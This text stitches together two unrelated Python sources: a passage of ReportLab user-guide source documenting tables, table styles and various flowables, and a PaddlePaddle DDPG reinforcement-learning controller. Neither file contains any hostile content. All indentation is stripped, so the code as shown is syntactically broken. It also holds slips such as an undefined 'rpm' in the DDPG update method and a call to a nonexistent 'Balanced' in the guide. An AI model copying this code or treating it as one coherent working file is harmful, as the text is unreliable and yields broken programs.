complex scheme in which the lead cell of a span contains the actual contents.""")
disc("""
$Tables$ are created by passing the constructor an optional sequence of column widths,
an optional sequence of row heights, and the data in row order.
Drawing of the table can be controlled by using a $TableStyle$ instance. This allows control of the
color and weight of the lines (if any), and the font, alignment and padding of the text.
A primitive automatic row height and or column width calculation mechanism is provided for.
""")
heading2('$Table$ User Methods')
disc("""These are the main methods which are of interest to the client programmer.""")
heading4("""$Table(data, colWidths=None, rowHeights=None, style=None, splitByRow=1,
repeatRows=0, repeatCols=0, rowSplitRange=None, spaceBefore=None, spaceAfter=None, cornerRadii=None)$""")
disc("""The $data$ argument is a sequence of sequences of cell values each of which
should be convertible to a string value using the $str$ function or should be a Flowable instance (such as a $Paragraph$) or a list (or tuple) of such instances.
If a cell value is a $Flowable$ or list of $Flowables$ these must either have a determined width
or the containing column must have a fixed width.
The first row of cell values
is in $data[0]$ i.e. the values are in row order. The $i$, $j$<sup>th.</sup> cell value is in
$data[i][j]$. Newline characters $'\\n'$ in cell values are treated as line split characters and
are used at <i>draw</i> time to format the cell into lines.
""")
disc("""The other arguments are fairly obvious, the $colWidths$ argument is a sequence
of numbers or possibly $None$, representing the widths of the columns. The number of elements
in $colWidths$ determines the number of columns in the table.
A value of $None$ means that the corresponding column width should be calculated automatically.""")
disc("""The $rowHeights$ argument is a sequence
of numbers or possibly $None$, representing the heights of the rows. The number of elements
in $rowHeights$ determines the number of rows in the table.
A value of $None$ means that the corresponding row height should be calculated automatically.""")
disc("""The $style$ argument can be an initial style for the table.""")
disc("""The $splitByRow$ argument is only needed for tables both too tall and too wide
to fit in the current context. In this case you must decide whether to 'tile'
down and across, or across and then down. This parameter is a Boolean indicating that the
$Table$ should split itself
by row before attempting to split itself by column when too little space is available in
the current drawing area and the caller wants the $Table$ to split.
Splitting a $Table$ by column is currently not implemented, so setting $splitByRow$ to $False$ will result in a $NotImplementedError$.""")
disc("""The $repeatRows$ argument specifies the number or a tuple of leading rows
that should be repeated when the $Table$ is asked to split itself. If it is a tuple it should specify which of the leading rows should be repeated; this allows
for cases where the first appearance of the table hsa more leading rows than later split parts.
The $repeatCols$ argument is currently ignored as a $Table$ cannot be split by column.""")
disc("""The $rowSplitRange$ argument may be used to control the splitting of the table to a subset of its rows; that can be to prevent splitting too close to the beginning or end of the table.""")
disc("""The $spaceBefore$ & $spaceAfter$ arguments may be used to put extra space before or after the table when renedered in a $platypus$ story.""")
disc("""The $style$ argument can be an initial style for the table.""")
disc("""The $cornerRadii$ argument can be a list of the top left, top right, bottom left and bottom right radii.
A positive non-zero radius indicates that the corner should be rounded. This argument will override any $ROUNDEDCORNERS$ command in the argument $style$ list (ie it has pririty).""")
heading4('$Table.setStyle(tblStyle)$')
disc("""
This method applies a particular instance of class $TableStyle$ (discussed below)
to the $Table$ instance. This is the only way to get $tables$ to appear
in a nicely formatted way.
""")
disc("""
Successive uses of the $setStyle$ method apply the styles in an additive fashion.
That is, later applications override earlier ones where they overlap.
""")
heading2('$TableStyle$')
disc("""
This class is created by passing it a sequence of <i>commands</i>, each command
is a tuple identified by its first element which is a string; the remaining
elements of the command tuple represent the start and stop cell coordinates
of the command and possibly thickness and colors, etc.
""")
heading2("$TableStyle$ User Methods")
heading3("$TableStyle(commandSequence)$")
disc("""The creation method initializes the $TableStyle$ with the argument
command sequence as an example:""")
eg("""
LIST_STYLE = TableStyle(
[('LINEABOVE', (0,0), (-1,0), 2, colors.green),
('LINEABOVE', (0,1), (-1,-1), 0.25, colors.black),
('LINEBELOW', (0,-1), (-1,-1), 2, colors.green),
('ALIGN', (1,1), (-1,-1), 'RIGHT')]
)
""")
heading3("$TableStyle.add(commandSequence)$")
disc("""This method allows you to add commands to an existing
$TableStyle$, i.e. you can build up $TableStyles$ in multiple statements.
""")
eg("""
LIST_STYLE.add('BACKGROUND', (0,0), (-1,0), colors.Color(0,0.7,0.7))
""")
heading3("$TableStyle.getCommands()$")
disc("""This method returns the sequence of commands of the instance.""")
eg("""
cmds = LIST_STYLE.getCommands()
""")
heading2("$TableStyle$ Commands")
disc("""The commands passed to $TableStyles$ come in three main groups
which affect the table background, draw lines, or set cell styles.
""")
disc("""The first element of each command is its identifier,
the second and third arguments determine the cell coordinates of
the box of cells which are affected with negative coordinates
counting backwards from the limit values as in <b>Python</b>
indexing. The coordinates are given as
(column, row) which follows the spreadsheet 'A1' model, but not
the more natural (for mathematicians) 'RC' ordering.
The top left cell is (0, 0) the bottom right is (-1, -1). Depending on
the command various extra (???) occur at indices beginning at 3 on.
""")
heading3("""$TableStyle$ Cell Formatting Commands""")
disc("""The cell formatting commands all begin with an identifier, followed by
the start and stop cell definitions and the perhaps other arguments.
the cell formatting commands are:""")
npeg("""
FONT - takes fontname, optional fontsize and optional leading.
FONTNAME (or FACE) - takes fontname.
FONTSIZE (or SIZE) - takes fontsize in points; leading may get out of sync.
LEADING - takes leading in points.
TEXTCOLOR - takes a color name or (R,G,B) tuple.
ALIGNMENT (or ALIGN) - takes one of LEFT, RIGHT and CENTRE (or CENTER) or DECIMAL.
LEFTPADDING - takes an integer, defaults to 6.
RIGHTPADDING - takes an integer, defaults to 6.
BOTTOMPADDING - takes an integer, defaults to 3.
TOPPADDING - takes an integer, defaults to 3.
BACKGROUND - takes a color defined by an object, string name or numeric tuple/list,
or takes a list/tuple describing a desired gradient fill which should
contain three elements of the form [DIRECTION, startColor, endColor]
where DIRECTION is either VERTICAL or HORIZONTAL.
ROWBACKGROUNDS - takes a list of colors to be used cyclically.
COLBACKGROUNDS - takes a list of colors to be used cyclically.
VALIGN - takes one of TOP, MIDDLE or the default BOTTOM
""")
disc("""This sets the background cell color in the relevant cells.
The following example shows the $BACKGROUND$, and $TEXTCOLOR$ commands in action:""")
EmbeddedCode("""
data= [['00', '01', '02', '03', '04'],
['10', '11', '12', '13', '14'],
['20', '21', '22', '23', '24'],
['30', '31', '32', '33', '34']]
t=Table(data)
t.setStyle(TableStyle([('BACKGROUND',(1,1),(-2,-2),colors.green),
('TEXTCOLOR',(0,0),(1,-1),colors.red)]))
""")
disc("""To see the effects of the alignment styles we need some widths
and a grid, but it should be easy to see where the styles come from.""")
EmbeddedCode("""
data= [['00', '01', '02', '03', '04'],
['10', '11', '12', '13', '14'],
['20', '21', '22', '23', '24'],
['30', '31', '32', '33', '34']]
t=Table(data,5*[0.4*inch], 4*[0.4*inch])
t.setStyle(TableStyle([('ALIGN',(1,1),(-2,-2),'RIGHT'),
('TEXTCOLOR',(1,1),(-2,-2),colors.red),
('VALIGN',(0,0),(0,-1),'TOP'),
('TEXTCOLOR',(0,0),(0,-1),colors.blue),
('ALIGN',(0,-1),(-1,-1),'CENTER'),
('VALIGN',(0,-1),(-1,-1),'MIDDLE'),
('TEXTCOLOR',(0,-1),(-1,-1),colors.green),
('INNERGRID', (0,0), (-1,-1), 0.25, colors.black),
('BOX', (0,0), (-1,-1), 0.25, colors.black),
]))
""")
heading3("""$TableStyle$ Line Commands""")
disc("""
Line commands begin with the identifier, the start and stop cell coordinates
and always follow this with the thickness (in points) and color of the desired lines. Colors can be names,
or they can be specified as a (R, G, B) tuple, where R, G and B are floats and (0, 0, 0) is black. The line
command names are: GRID, BOX, OUTLINE, INNERGRID, LINEBELOW, LINEABOVE, LINEBEFORE
and LINEAFTER. BOX and OUTLINE are equivalent, and GRID is the equivalent of applying both BOX and
INNERGRID.
""")
CPage(4.0)
disc("""We can see some line commands in action with the following example.
""")
EmbeddedCode("""
data= [['00', '01', '02', '03', '04'],
['10', '11', '12', '13', '14'],
['20', '21', '22', '23', '24'],
['30', '31', '32', '33', '34']]
t=Table(data,style=[('GRID',(1,1),(-2,-2),1,colors.green),
('BOX',(0,0),(1,-1),2,colors.red),
('LINEABOVE',(1,2),(-2,2),1,colors.blue),
('LINEBEFORE',(2,1),(2,-2),1,colors.pink),
])
""")
disc("""Line commands cause problems for tables when they split; the following example
shows a table being split in various positions""")
EmbeddedCode("""
data= [['00', '01', '02', '03', '04'],
['10', '11', '12', '13', '14'],
['20', '21', '22', '23', '24'],
['30', '31', '32', '33', '34']]
t=Table(data,style=[
('GRID',(0,0),(-1,-1),0.5,colors.grey),
('GRID',(1,1),(-2,-2),1,colors.green),
('BOX',(0,0),(1,-1),2,colors.red),
('BOX',(0,0),(-1,-1),2,colors.black),
('LINEABOVE',(1,2),(-2,2),1,colors.blue),
('LINEBEFORE',(2,1),(2,-2),1,colors.pink),
('BACKGROUND', (0, 0), (0, 1), colors.pink),
('BACKGROUND', (1, 1), (1, 2), colors.lavender),
('BACKGROUND', (2, 2), (2, 3), colors.orange),
])
""")
t=getStory()[-1]
getStory().append(Spacer(0,6))
for s in t.split(4*inch,30):
getStory().append(s)
getStory().append(Spacer(0,6))
getStory().append(Spacer(0,6))
for s in t.split(4*inch,36):
getStory().append(s)
getStory().append(Spacer(0,6))
disc("""When unsplit and split at the first or second row.""")
CPage(4.0)
heading3("""Complex Cell Values""")
disc("""
As mentioned above we can have complicated cell values including $Paragraphs$, $Images$ and other $Flowables$
or lists of the same. To see this in operation consider the following code and the table it produces.
Note that the $Image$ has a white background which will obscure any background you choose for the cell.
To get better results you should use a transparent background.
""")
import os, reportlab.platypus
I = '../images/replogo.gif'
EmbeddedCode("""
I = Image('%s')
I.drawHeight = 1.25*inch*I.drawHeight / I.drawWidth
I.drawWidth = 1.25*inch
P0 = Paragraph('''
<b>A pa<font color=red>r</font>a<i>graph</i></b>
<super><font color=yellow>1</font></super>''',
styleSheet["BodyText"])
P = Paragraph('''
<para align=center spaceb=3>The <b>ReportLab Left
<font color=red>Logo</font></b>
Image</para>''',
styleSheet["BodyText"])
data= [['A', 'B', 'C', P0, 'D'],
['00', '01', '02', [I,P], '04'],
['10', '11', '12', [P,I], '14'],
['20', '21', '22', '23', '24'],
['30', '31', '32', '33', '34']]
t=Table(data,style=[('GRID',(1,1),(-2,-2),1,colors.green),
('BOX',(0,0),(1,-1),2,colors.red),
('LINEABOVE',(1,2),(-2,2),1,colors.blue),
('LINEBEFORE',(2,1),(2,-2),1,colors.pink),
('BACKGROUND', (0, 0), (0, 1), colors.pink),
('BACKGROUND', (1, 1), (1, 2), colors.lavender),
('BACKGROUND', (2, 2), (2, 3), colors.orange),
('BOX',(0,0),(-1,-1),2,colors.black),
('GRID',(0,0),(-1,-1),0.5,colors.black),
('VALIGN',(3,0),(3,0),'BOTTOM'),
('BACKGROUND',(3,0),(3,0),colors.limegreen),
('BACKGROUND',(3,1),(3,1),colors.khaki),
('ALIGN',(3,1),(3,1),'CENTER'),
('BACKGROUND',(3,2),(3,2),colors.beige),
('ALIGN',(3,2),(3,2),'LEFT'),
])
t._argW[3]=1.5*inch
"""%I)
heading3("""$TableStyle$ Span Commands""")
disc("""Our $Table$ classes support the concept of spanning, but it isn't specified in the same way
as html. The style specification
""")
eg("""
SPAN, (sc,sr), (ec,er)
""")
disc("""indicates that the cells in columns $sc$ - $ec$ and rows $sr$ - $er$ should be combined into a super cell
with contents determined by the cell $(sc, sr)$. The other cells should be present, but should contain empty strings
or you may get unexpected results.
""")
EmbeddedCode("""
data= [['Top\\nLeft', '', '02', '03', '04'],
['', '', '12', '13', '14'],
['20', '21', '22', 'Bottom\\nRight', ''],
['30', '31', '32', '', '']]
t=Table(data,style=[
('GRID',(0,0),(-1,-1),0.5,colors.grey),
('BACKGROUND',(0,0),(1,1),colors.palegreen),
('SPAN',(0,0),(1,1)),
('BACKGROUND',(-2,-2),(-1,-1), colors.pink),
('SPAN',(-2,-2),(-1,-1)),
])
""")
disc("""notice that we don't need to be conservative with our $GRID$ command. The spanned cells are not drawn through.
""")
heading3("""$TableStyle$ Miscellaneous Commands""")
disc("""To control $Table$ splitting the $NOSPLIT$ command may be used
The style specification
""")
eg("""
NOSPLIT, (sc,sr), (ec,er)
""")
disc("""demands that the cells in columns $sc$ - $ec$ and rows $sr$ - $er$ may not be split.""")
eg("")
eg("")
disc("""To control $Table$ corner rounding the $ROUNDEDCORNERS$ command may be used
The style specification
""")
eg("""
ROUNDEDCORNERS, [tl, tr, bl, br]
""")
disc("""specifies the radii of the top left, top right, bottom left and bottom right. A value of $0$ indicates a square corner. replace the whole array by $None$ to turn off all rounding.
<br/>Borders at a rounded corner are curved by an octant.""")
heading3("""Special $TableStyle$ Indeces""")
disc("""In any style command the first row index may be set to one of the special strings
$'splitlast'$ or $'splitfirst'$ to indicate that the style should be used only for the last row of
a split table, or the first row of a continuation. This allows splitting tables with nicer effects around the split.""")
heading1("""Programming $Flowables$""")
disc("""The following flowables let you conditionally evaluate and execute expressions and statements at wrap time:""")
heading2("""$DocAssign(self, var, expr, life='forever')$""")
disc("""Assigns a variable of name $var$ to the expression $expr$. E.g.:""")
eg("""
DocAssign('i',3)
""")
heading2("""$DocExec(self, stmt, lifetime='forever')$""")
disc("""Executes the statement $stmt$. E.g.:""")
eg("""
DocExec('i-=1')
""")
heading2("""$DocPara(self, expr, format=None, style=None, klass=None, escape=True)$""")
disc("""Creates a paragraph with the value of expr as text.
If format is specified it should use %(__expr__)s for string interpolation
of the expression expr (if any). It may also use %(name)s interpolations
for other variables in the namespace. E.g.:""")
eg("""
DocPara('i',format='The value of i is %(__expr__)d',style=normal)
""")
heading2("""$DocAssert(self, cond, format=None)$""")
disc("""Raises an $AssertionError$ containing the $format$ string if $cond$ evaluates as $False$.""")
eg("""
DocAssert(val, 'val is False')
""")
heading2("""$DocIf(self, cond, thenBlock, elseBlock=[])$""")
disc("""If $cond$ evaluates as $True$, this flowable is replaced by the $thenBlock$ elsethe $elseBlock$.""")
eg("""
DocIf('i>3',Paragraph('The value of i is larger than 3',normal),\\
Paragraph('The value of i is not larger than 3',normal))
""")
heading2("""$DocWhile(self, cond, whileBlock)$""")
disc("""Runs the $whileBlock$ while $cond$ evaluates to $True$. E.g.:""")
eg("""
DocAssign('i',5)
DocWhile('i',[DocPara('i',format='The value of i is %(__expr__)d',style=normal),DocExec('i-=1')])
""")
disc("""This example produces a set of paragraphs of the form:""")
eg("""
The value of i is 5
The value of i is 4
The value of i is 3
The value of i is 2
The value of i is 1
""")
heading1("""Other Useful $Flowables$""")
heading2("""$Preformatted(text, style, bulletText=None, dedent=0, maxLineLength=None, splitChars=None, newLineChars=None)$""")
disc("""
Creates a preformatted paragraph which does no wrapping, line splitting or other manipulations.
No $XML$ style tags are taken account of in the text.
If dedent is non zero $dedent$ common leading
spaces will be removed from the front of each line.
""")
heading3("Defining a maximum line length")
disc("""
You can use the property $maxLineLength$ to define a maximum line length. If a line length exceeds this maximum value, the line will be automatically splitted.
""")
disc("""
The line will be split on any single character defined in $splitChars$. If no value is provided for this property, the line will be split on any of the following standard characters: space, colon, full stop, semi-colon, coma, hyphen, forward slash, back slash, left parenthesis, left square bracket and left curly brace
""")
disc("""
Characters can be automatically inserted at the beginning of each line that has been created. You can set the property $newLineChars$ to the characters you want to use.
""")
EmbeddedCode("""
from reportlab.lib.styles import getSampleStyleSheet
stylesheet=getSampleStyleSheet()
normalStyle = stylesheet['Code']
text='''
class XPreformatted(Paragraph):
def __init__(self, text, style, bulletText = None, frags=None, caseSensitive=1):
self.caseSensitive = caseSensitive
if maximumLineLength and text:
text = self.stopLine(text, maximumLineLength, splitCharacters)
cleaner = lambda text, dedent=dedent: ''.join(_dedenter(text or '',dedent))
self._setup(text, style, bulletText, frags, cleaner)
'''
t=Preformatted(text,normalStyle,maxLineLength=60, newLineChars='> ')
""")
heading2("""$XPreformatted(text, style, bulletText=None, dedent=0, frags=None)$""")
disc("""
This is a non rearranging form of the $Paragraph$ class; XML tags are allowed in
$text$ and have the same meanings as for the $Paragraph$ class.
As for $Preformatted$, if dedent is non zero $dedent$ common leading
spaces will be removed from the front of each line.
""")
EmbeddedCode("""
from reportlab.lib.styles import getSampleStyleSheet
stylesheet=getSampleStyleSheet()
normalStyle = stylesheet['Code']
text='''
This is a non rearranging form of the <b>Paragraph</b> class;
<b><font color=red>XML</font></b> tags are allowed in <i>text</i> and have the same
meanings as for the <b>Paragraph</b> class.
As for <b>Preformatted</b>, if dedent is non zero <font color="red" size="+1">dedent</font>
common leading spaces will be removed from the
front of each line.
You can have &amp; style entities as well for & < > and ".
'''
t=XPreformatted(text,normalStyle,dedent=3)
""")
heading2("""$Image(filename, width=None, height=None)$""")
disc("""Create a flowable which will contain the image defined by the data in file $filename$ which can be
filepath, file like object or an instance of a $reportlab.graphics.shapes.Drawing$.
The default <b>PDF</b> image type <i>jpeg</i> is supported and if the <b>PIL</b> extension to <b>Python</b>
is installed the other image types can also be handled. If $width$ and or $height$ are specified
then they determine the dimension of the displayed image in <i>points</i>. If either dimension is
not specified (or specified as $None$) then the corresponding pixel dimension of the image is assumed
to be in <i>points</i> and used.
""")
I="../images/lj8100.jpg"
eg("""
Image("lj8100.jpg")
""",after=0.1)
disc("""will display as""")
try:
getStory().append(Image(I))
except:
disc("""An image should have appeared here.""")
disc("""whereas""")
eg("""
im = Image("lj8100.jpg", width=2*inch, height=2*inch)
im.hAlign = 'CENTER'
""", after=0.1)
disc('produces')
try:
im = Image(I, width=2*inch, height=2*inch)
im.hAlign = 'CENTER'
getStory().append(Image(I, width=2*inch, height=2*inch))
except:
disc("""An image should have appeared here.""")
heading2("""$Spacer(width, height)$""")
disc("""This does exactly as would be expected; it adds a certain amount of space into the story.
At present this only works for vertical space.
""")
CPage(1)
heading2("""$PageBreak()$""")
disc("""This $Flowable$ represents a page break. It works by effectively consuming all vertical
space given to it. This is sufficient for a single $Frame$ document, but would only be a
frame break for multiple frames so the $BaseDocTemplate$ mechanism
detects $pageBreaks$ internally and handles them specially.
""")
CPage(1)
heading2("""$CondPageBreak(height)$""")
disc("""This $Flowable$ attempts to force a $Frame$ break if insufficient vertical space remains
in the current $Frame$. It is thus probably wrongly named and should probably be renamed as
$CondFrameBreak$.
""")
CPage(1)
heading2("""$KeepTogether(flowables)$""")
disc("""
This compound $Flowable$ takes a list of $Flowables$ and attempts to keep them in the same $Frame$.
If the total height of the $Flowables$ in the list $flowables$ exceeds the current frame's available
space then all the space is used and a frame break is forced.
""")
CPage(1)
heading2("""$TableOfContents()$""")
disc("""
A table of contents can be generated by using the $TableOfContents$ flowable.
The following steps are needed to add a table of contents to your document:
""")
disc("""Create an instance of $TableOfContents$. Override the level styles (optional) and add the object to the story:""")
eg("""
toc = TableOfContents()
PS = ParagraphStyle
toc.levelStyles = [
PS(fontName='Times-Bold', fontSize=14, name='TOCHeading1',
leftIndent=20, firstLineIndent=-20, spaceBefore=5, leading=16),
PS(fontSize=12, name='TOCHeading2',
leftIndent=40, firstLineIndent=-20, spaceBefore=0, leading=12),
PS(fontSize=10, name='TOCHeading3',
leftIndent=60, firstLineIndent=-20, spaceBefore=0, leading=12),
PS(fontSize=10, name='TOCHeading4',
leftIndent=100, firstLineIndent=-20, spaceBefore=0, leading=12),
]
story.append(toc)
""")
disc("""Entries to the table of contents can be done either manually by calling
the $addEntry$ method on the $TableOfContents$ object or automatically by sending
a $'TOCEntry'$ notification in the $afterFlowable$ method of the $DocTemplate$
you are using.
The data to be passed to $notify$ is a list of three or four items countaining
a level number, the entry text, the page number and an optional destination key
which the entry should point to.
This list will usually be created in a document template's method
like afterFlowable(), making notification calls using the notify()
method with appropriate data like this:
""")
eg('''
def afterFlowable(self, flowable):
"""Detect Level 1 and 2 headings, build outline,
and track chapter title."""
if isinstance(flowable, Paragraph):
txt = flowable.getPlainText()
if style == 'Heading1':
# ...
self.notify('TOCEntry', (0, txt, self.page))
elif style == 'Heading2':
# ...
key = 'h2-%s' % self.seq.nextf('heading2')
self.canv.bookmarkPage(key)
self.notify('TOCEntry', (1, txt, self.page, key))
# ...
''')
disc("""This way, whenever a paragraph of style $'Heading1'$ or $'Heading2'$ is added to the story, it will appear in the table of contents.
$Heading2$ entries will be clickable because a bookmarked key has been supplied.
""")
disc("""Finally you need to use the $multiBuild$ method of the DocTemplate because tables of contents need several passes to be generated:""")
eg("""
doc.multiBuild(story)
""")
disc("""Below is a simple but working example of a document with a table of contents:""")
eg('''
from reportlab.lib.styles import ParagraphStyle as PS
from reportlab.platypus import PageBreak
from reportlab.platypus.paragraph import Paragraph
from reportlab.platypus.doctemplate import PageTemplate, BaseDocTemplate
from reportlab.platypus.tableofcontents import TableOfContents
from reportlab.platypus.frames import Frame
from reportlab.lib.units import cm
class MyDocTemplate(BaseDocTemplate):
def __init__(self, filename, **kw):
self.allowSplitting = 0
BaseDocTemplate.__init__(self, filename, **kw)
template = PageTemplate('normal', [Frame(2.5*cm, 2.5*cm, 15*cm, 25*cm, id='F1')])
self.addPageTemplates(template)
def afterFlowable(self, flowable):
"Registers TOC entries."
if flowable.__class__.__name__ == 'Paragraph':
text = flowable.getPlainText()
style = flowable.style.name
if style == 'Heading1':
self.notify('TOCEntry', (0, text, self.page))
if style == 'Heading2':
self.notify('TOCEntry', (1, text, self.page))
h1 = PS(name = 'Heading1',
fontSize = 14,
leading = 16)
h2 = PS(name = 'Heading2',
fontSize = 12,
leading = 14,
leftIndent = delta)
# Build story.
story = []
toc = TableOfContents()
# For conciseness we use the same styles for headings and TOC entries
toc.levelStyles = [h1, h2]
story.append(toc)
story.append(PageBreak())
story.append(Paragraph('First heading', h1))
story.append(Paragraph('Text in first heading', PS('body')))
story.append(Paragraph('First sub heading', h2))
story.append(Paragraph('Text in first sub heading', PS('body')))
story.append(PageBreak())
story.append(Paragraph('Second sub heading', h2))
story.append(Paragraph('Text in second sub heading', PS('body')))
story.append(Paragraph('Last heading', h1))
doc = MyDocTemplate('mintoc.pdf')
doc.multiBuild(story)
''')
CPage(1)
heading2("""$SimpleIndex()$""")
disc("""
An index can be generated by using the $SimpleIndex$ flowable.
The following steps are needed to add an index to your document:
""")
disc("""Use the index tag in paragraphs to index terms:""")
eg('''
story = []
...
story.append('The third <index item="word" />word of this paragraph is indexed.')
''')
disc("""Create an instance of $SimpleIndex$ and add it to the story where you want it to appear:""")
eg('''
index = SimpleIndex(dot=' . ', headers=headers)
story.append(index)
''')
disc("""The parameters which you can pass into the SimpleIndex constructor are explained in the reportlab reference. Now, build the document by using the canvas maker returned by SimpleIndex.getCanvasMaker():""")
eg("""
doc.build(story, canvasmaker=index.getCanvasMaker())
""")
disc("""To build an index with multiple levels, pass a comma-separated list of items to the item attribute of an index tag:""")
eg("""
<index item="terma,termb,termc" />
<index item="terma,termd" />
""")
disc("""terma will respresent the top-most level and termc the most specific term. termd and termb will appear in the same level inside terma.""")
disc("""If you need to index a term containing a comma, you will need to escape it by doubling it. To avoid the ambiguity of three consecutive commas (an escaped comma followed by a list separator or a list separator followed by an escaped comma?) introduce a space in the right position. Spaces at the beginning or end of terms will be removed.""")
eg("""
<index item="comma(,,), ,, ,... " />
""")
disc("""
This indexes the terms "comma (,)", "," and "...".
""")
heading2("""$ListFlowable(),ListItem()$""")
disc("""
Use these classes to make ordered and unordered lists. Lists can be nested.
""")
disc("""
$ListFlowable()$ will create an ordered list, which can contain any flowable. The class has a number of parameters to change font, colour, size, style and position of list numbers, or of bullets in unordered lists. The type of numbering can also be set to use lower or upper case letters ('A,B,C' etc.) or Roman numerals (capitals or lowercase) using the bulletType property. To change the list to an unordered type, set bulletType='bullet'.
""")
disc("""
Items within a $ListFlowable()$ list can be changed from their default appearance by wrapping them in a $ListItem()$ class and setting its properties.
""")
disc("""
The following will create an ordered list, and set the third item to an unordered sublist.
""")
EmbeddedCode("""
from reportlab.platypus import ListFlowable, ListItem
from reportlab.lib.styles import getSampleStyleSheet
styles = getSampleStyleSheet()
style = styles["Normal"]
t = ListFlowable(
[
Paragraph("Item no.1", style),
ListItem(Paragraph("Item no. 2", style),bulletColor="green",value=7),
ListFlowable(
[
Paragraph("sublist item 1", style),
ListItem(Paragraph('sublist item 2', style),bulletColor='red',value='square')
],
bulletType='bullet',
start='square',
),
Paragraph("Item no.4", style),
],
bulletType='i'
)
""")
disc("""To cope with nesting the $start$ parameter can be set to a list of possible starts; for $ul$ acceptable starts are any unicode character or specific names known to flowables.py eg
$bulletchar$, $circle$, $square$, $disc$, $diamond$, $diamondwx$, $rarrowhead$, $sparkle$, $squarelrs$ or $blackstar$. For $ol$ the $start$ can be any character from $'1iaAI'$ to indicate different number styles.
""")
heading2("""$BalancedColumns()$""")
disc("""Use the $BalancedColumns$ class to make a flowable that splits its content flowables into two or more roughly equal sized columns.
Effectively $n$ frames are synthesized to take the content and the flowable tries to balance the content between them. The created frames
will be split when the total height is too large and the split will maintain the balance.
""")
eg("""
from reportlab.platypus.flowables import BalancedColumns
from reportlab.platypus.frames import ShowBoundaryValue
F = [
list of flowables........
]
story.append(
Balanced(
F, #the flowables we are balancing
nCols = 2, #the number of columns
needed = 72,#the minimum space needed by the flowable
spacBefore = 0,
spaceAfter = 0,
showBoundary = None, #optional boundary showing
leftPadding=None, #these override the created frame
rightPadding=None, #paddings if specified else the
topPadding=None, #default frame paddings
bottomPadding=None, #are used
innerPadding=None, #the gap between frames if specified else
#use max(leftPadding,rightPadding)
name='', #for identification purposes when stuff goes awry
endSlack=0.1, #height disparity allowance ie 10% of available height
)
)
""")
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import parl
from parl import layers
import paddle
from paddle import fluid
from ..utils import RLCONTROLLER, action_mapping
from ...controller import RLBaseController
from .ddpg_model import DefaultDDPGModel as default_ddpg_model
from .noise import AdaptiveNoiseSpec as default_noise
from parl.utils import ReplayMemory
__all__ = ['DDPG']
class DDPGAgent(parl.Agent):
def __init__(self, algorithm, obs_dim, act_dim):
assert isinstance(obs_dim, int)
assert isinstance(act_dim, int)
self.obs_dim = obs_dim
self.act_dim = act_dim
super(DDPGAgent, self).__init__(algorithm)
# Attention: In the beginning, sync target model totally.
self.alg.sync_target(decay=0)
def build_program(self):
self.pred_program = paddle.static.Program()
self.learn_program = paddle.static.Program()
with paddle.static.program_guard(self.pred_program):
obs = fluid.data(
name='obs', shape=[None, self.obs_dim], dtype='float32')
self.pred_act = self.alg.predict(obs)
with paddle.static.program_guard(self.learn_program):
obs = fluid.data(
name='obs', shape=[None, self.obs_dim], dtype='float32')
act = fluid.data(
name='act', shape=[None, self.act_dim], dtype='float32')
reward = fluid.data(name='reward', shape=[None], dtype='float32')
next_obs = fluid.data(
name='next_obs', shape=[None, self.obs_dim], dtype='float32')
terminal = fluid.data(
name='terminal', shape=[None, 1], dtype='bool')
_, self.critic_cost = self.alg.learn(obs, act, reward, next_obs,
terminal)
def predict(self, obs):
act = self.fluid_executor.run(self.pred_program,
feed={'obs': obs},
fetch_list=[self.pred_act])[0]
return act
def learn(self, obs, act, reward, next_obs, terminal):
feed = {
'obs': obs,
'act': act,
'reward': reward,
'next_obs': next_obs,
'terminal': terminal
}
critic_cost = self.fluid_executor.run(self.learn_program,
feed=feed,
fetch_list=[self.critic_cost])[0]
self.alg.sync_target()
return critic_cost
@RLCONTROLLER.register
class DDPG(RLBaseController):
def __init__(self, range_tables, use_gpu=False, **kwargs):
self.use_gpu = use_gpu
self.range_tables = range_tables - np.asarray(1)
self.act_dim = len(self.range_tables)
self.obs_dim = kwargs.get('obs_dim')
self.model = kwargs.get(
'model') if 'model' in kwargs else default_ddpg_model
self.actor_lr = kwargs.get('actor_lr') if 'actor_lr' in kwargs else 1e-4
self.critic_lr = kwargs.get(
'critic_lr') if 'critic_lr' in kwargs else 1e-3
self.gamma = kwargs.get('gamma') if 'gamma' in kwargs else 0.99
self.tau = kwargs.get('tau') if 'tau' in kwargs else 0.001
self.memory_size = kwargs.get(
'memory_size') if 'memory_size' in kwargs else 10
self.reward_scale = kwargs.get(
'reward_scale') if 'reward_scale' in kwargs else 0.1
self.batch_size = kwargs.get(
'controller_batch_size') if 'controller_batch_size' in kwargs else 1
self.actions_noise = kwargs.get(
'actions_noise') if 'actions_noise' in kwargs else default_noise
self.action_dist = 0.0
self.place = paddle.CUDAPlace(0) if self.use_gpu else paddle.CPUPlace()
model = self.model(self.act_dim)
if self.actions_noise:
self.actions_noise = self.actions_noise()
algorithm = parl.algorithms.DDPG(
model,
gamma=self.gamma,
tau=self.tau,
actor_lr=self.actor_lr,
critic_lr=self.critic_lr)
self.agent = DDPGAgent(algorithm, self.obs_dim, self.act_dim)
self.rpm = ReplayMemory(self.memory_size, self.obs_dim, self.act_dim)
self.pred_program = self.agent.pred_program
self.learn_program = self.agent.learn_program
self.param_dict = self.get_params(self.learn_program)
def next_tokens(self, obs, params_dict, is_inference=False):
batch_obs = np.expand_dims(obs, axis=0)
self.set_params(self.pred_program, params_dict, self.place)
actions = self.agent.predict(batch_obs.astype('float32'))
### add noise to action
if self.actions_noise and is_inference == False:
actions_noise = np.clip(
np.random.normal(
actions, scale=self.actions_noise.stdev_curr),
-1.0,
1.0)
self.action_dist = np.mean(np.abs(actions_noise - actions))
else:
actions_noise = actions
actions_noise = action_mapping(actions_noise, self.range_tables)
return actions_noise
def _update_noise(self, actions_dist):
self.actions_noise.update(actions_dist)
def update(self, rewards, params_dict, obs, actions, obs_next, terminal):
self.set_params(self.learn_program, params_dict, self.place)
self.rpm.append(obs, actions, self.reward_scale * rewards, obs_next,
terminal)
if self.actions_noise:
self._update_noise(self.action_dist)
if self.rpm.size() > self.memory_size:
obs, actions, rewards, obs_next, terminal = rpm.sample_batch(
self.batch_size)
self.agent.learn(obs, actions, rewards, obs_next, terminal)
